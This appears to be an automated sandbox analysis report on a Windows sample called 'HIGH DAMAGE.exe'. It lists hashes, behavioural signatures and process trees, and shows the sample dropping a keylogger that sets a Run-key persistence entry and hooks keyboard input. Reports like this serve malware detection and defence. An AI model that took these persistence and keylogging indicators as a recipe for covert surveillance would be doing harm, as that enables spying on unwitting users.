1a3bd1e33de6d8ff3d9441d49f463f63afb02c6940513ed390440e89006c6813

Analysis

max time kernel
1021s
max time network
1052s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04-02-2023 18:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HIGH DAMAGE.exe
Size

13.8MB
MD5

ac57f71e120e2d8f28972914dccdbe11
SHA1

fd4b154b11ab09f9c89deaddcd3383f2c472edc0
SHA256

1a3bd1e33de6d8ff3d9441d49f463f63afb02c6940513ed390440e89006c6813
SHA512

3c4c819e1a0990034e9cc8c177dcdb470956277da7681fe515c99bcaac55e8af4dffbe92c56647c91d15e76bafabd84810818d7601a5779116ea908d93c9ce59
SSDEEP

196608:bSXZAlqpb7KX/x1HhyehNJm3AqdKDnO8NpkSgsAGKaR2ehmytu9mEyDk3e3yRpT:IZAlqYXJBb/m3pgDOEkSgsvpuQrkuAp

Score

8^/10

persistence upx

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

installer_trial.exeinstaller_trial.tmpsfk.exesfk.tmpqrl.exeqrl.exe_setup64.tmp7za.exe7za.exesyscrb.exesfk.exesfk.tmpChromeRecovery.exe

pid	process
1732	installer_trial.exe
1796	installer_trial.tmp
2280	sfk.exe
1704	sfk.tmp
1132	qrl.exe
836	qrl.exe
1712	_setup64.tmp
1072	7za.exe
1988	7za.exe
1968	syscrb.exe
316	sfk.exe
2956	sfk.tmp
1012	ChromeRecovery.exe

Loads dropped DLL 17 IoCs

Processes:

HIGH DAMAGE.exeHIGH DAMAGE.exeHIGH DAMAGE.exeHIGH DAMAGE.exeinstaller_trial.exeinstaller_trial.tmpsfk.exesfk.tmpcmd.execmd.exesyscrb.execmd.exesfk.exe

pid	process
1628	HIGH DAMAGE.exe
2248	HIGH DAMAGE.exe
2296	HIGH DAMAGE.exe
2360	HIGH DAMAGE.exe
1732	installer_trial.exe
1796	installer_trial.tmp
2280	sfk.exe
1704	sfk.tmp
1704	sfk.tmp
1384	cmd.exe
2132	cmd.exe
1796	installer_trial.tmp
1796	installer_trial.tmp
1796	installer_trial.tmp
1968	syscrb.exe
2904	cmd.exe
316	sfk.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI16642\python310.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI16642\python310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI22322\python310.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI22322\python310.dll	upx
behavioral1/memory/2248-67-0x000007FEF3B00000-0x000007FEF3F6E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI22802\python310.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI22802\python310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI23442\python310.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI23442\python310.dll	upx
behavioral1/memory/2360-78-0x000007FEF37F0000-0x000007FEF3C5E000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

installer_trial.tmp

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	installer_trial.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\syscrb = "\"C:\\Program Files\\Best Free Keylogger\\syscrb.exe\""	installer_trial.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

331 ipapi.co

flow	ioc
331	ipapi.co

Drops file in Program Files directory 64 IoCs

Processes:

7za.exesyscrb.exeelevation_service.exeinstaller_trial.tmp

description	ioc	process
File created	C:\Program Files\Best Free Keylogger\KeyCapEngine.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\syscrb.xml	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\System.Data.SQLite.Linq.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\tgrid.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\update\35\x64\SQLite.Interop.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\update\451\BfkUpdater.exe	7za.exe
File created	C:\Program Files\Best Free Keylogger\CrypUtil.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\CrypUtil.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\x86\SQLite.Interop.dll	syscrb.exe
File created	C:\Program Files\Best Free Keylogger\update\451\System.Data.SQLite.Linq.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\syscrb.exe	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451	7za.exe
File created	C:\Program Files\Best Free Keylogger\update\451\Ionic.Zip.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\System.Data.SQLite.EF6.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\bwurcap.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\MonthC.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\System.Data.SQLite.dll	syscrb.exe
File created	C:\Program Files\Best Free Keylogger\System.Data.SQLite.Linq.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\Uninstaller.exe.config	7za.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\BfkUpdater.xml	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\update\451\System.Data.SQLite.EF6.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\x86\SQLite.Interop.dll	syscrb.exe
File created	C:\Program Files\Best Free Keylogger\is-4A58J.tmp	installer_trial.tmp
File created	C:\Program Files\Best Free Keylogger\syscrb.exe	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\System.Data.SQLite.xml	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\System.Data.SQLite.EF6.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\x64	syscrb.exe
File created	C:\Program Files\Best Free Keylogger\bwurcap.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\syscrb.exe.config	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\Ionic.Zip.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.Linq.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\x64	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\x86	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.xml	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\System.Data.SQLite.xml	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\actstc32.dll	7za.exe
File created	C:\Program Files\Best Free Keylogger\System.Data.SQLite.xml	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\x86	syscrb.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\Best Free Keylogger\update\35\x86\SQLite.Interop.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\Ionic.Zip.dll	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\CrypUtil.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\EntityFramework.xml	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\Test_File.txt	7za.exe
File created	C:\Program Files\Best Free Keylogger\x64\SQLite.Interop.dll	7za.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Best Free Keylogger\Uninstaller.exe.config	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\x64	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.Linq.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\x64\SQLite.Interop.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\451\BfkUpdater.exe	syscrb.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2280_1353327787\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Best Free Keylogger\KeyCapEngine.dll	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\syscrb.xml	syscrb.exe
File created	C:\Program Files\Best Free Keylogger\Test_File.txt	7za.exe
File created	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.dll.config	7za.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger\update\35\System.Data.SQLite.dll.config	syscrb.exe
File opened for modification	C:\Program Files\Best Free Keylogger	installer_trial.tmp
File created	C:\Program Files\Best Free Keylogger\is-BLNI0.tmp	installer_trial.tmp
File created	C:\Program Files\Best Free Keylogger\update\451\BfkUpdater.exe.config	7za.exe

Drops file in Windows directory 2 IoCs

Processes:

installer_trial.tmp

description ioc process

File created C:\Windows\Fonts\is-BKMJT.tmp installer_trial.tmp
File created C:\Windows\Fonts\is-CSVTU.tmp installer_trial.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Fonts\is-BKMJT.tmp	installer_trial.tmp
File created	C:\Windows\Fonts\is-CSVTU.tmp	installer_trial.tmp

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

syscrb.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\syscrb.exe = "11001"	syscrb.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TypedURLs	syscrb.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	syscrb.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	syscrb.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	syscrb.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exepowershell.exeinstaller_trial.tmpsyscrb.exe

pid	process
1136	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
2052	chrome.exe
2804	chrome.exe
2804	chrome.exe
2276	chrome.exe
2804	chrome.exe
2804	chrome.exe
2536	chrome.exe
2628	chrome.exe
1580	chrome.exe
1984	chrome.exe
1488	chrome.exe
3048	chrome.exe
1484	chrome.exe
2328	powershell.exe
1796	installer_trial.tmp
1796	installer_trial.tmp
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

syscrb.exesfk.tmp

pid process

1968 syscrb.exe
2956 sfk.tmp

pid	process
1968	syscrb.exe
2956	sfk.tmp

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

AUDIODG.EXEpowershell.exe7za.exe7za.exesyscrb.exe

description	pid	process
Token: 33	2116	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2116	AUDIODG.EXE
Token: 33	2116	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2116	AUDIODG.EXE
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeRestorePrivilege	1072	7za.exe
Token: 35	1072	7za.exe
Token: SeSecurityPrivilege	1072	7za.exe
Token: SeSecurityPrivilege	1072	7za.exe
Token: SeRestorePrivilege	1988	7za.exe
Token: 35	1988	7za.exe
Token: SeSecurityPrivilege	1988	7za.exe
Token: SeSecurityPrivilege	1988	7za.exe
Token: SeDebugPrivilege	1968	syscrb.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exechrome.exe

pid	process
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
1452	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe
2804	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

syscrb.exe

pid process

1968 syscrb.exe
1968 syscrb.exe
1968 syscrb.exe

pid	process
1968	syscrb.exe
1968	syscrb.exe
1968	syscrb.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

HIGH DAMAGE.exechrome.exe

description	pid	process	target process
PID 1664 wrote to memory of 1628	1664	HIGH DAMAGE.exe	HIGH DAMAGE.exe
PID 1664 wrote to memory of 1628	1664	HIGH DAMAGE.exe	HIGH DAMAGE.exe
PID 1664 wrote to memory of 1628	1664	HIGH DAMAGE.exe	HIGH DAMAGE.exe
PID 1452 wrote to memory of 1304	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1304	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1304	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1720	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1136	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1136	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 1136	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe
PID 1452 wrote to memory of 316	1452	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe
"C:\Users\Admin\AppData\Local\Temp\HIGH DAMAGE.exe"
2⤵
- Loads dropped DLL
PID:1628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6464f50,0x7fef6464f60,0x7fef6464f70
2⤵
PID:1304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1116 /prefetch:2
2⤵
PID:1720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1328 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1776 /prefetch:8
2⤵
PID:316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
2⤵
PID:1068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2056 /prefetch:1
2⤵
PID:1696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
2⤵
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3264 /prefetch:2
2⤵
PID:1388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
2⤵
PID:980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3500 /prefetch:8
2⤵
PID:2056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:8
2⤵
PID:2064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:8
2⤵
PID:2440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1836 /prefetch:8
2⤵
PID:2448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1740 /prefetch:8
2⤵
PID:2456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4164 /prefetch:8
2⤵
PID:2480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
2⤵
PID:2472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,1994392349295393608,12507444772679485990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
2⤵
PID:2464

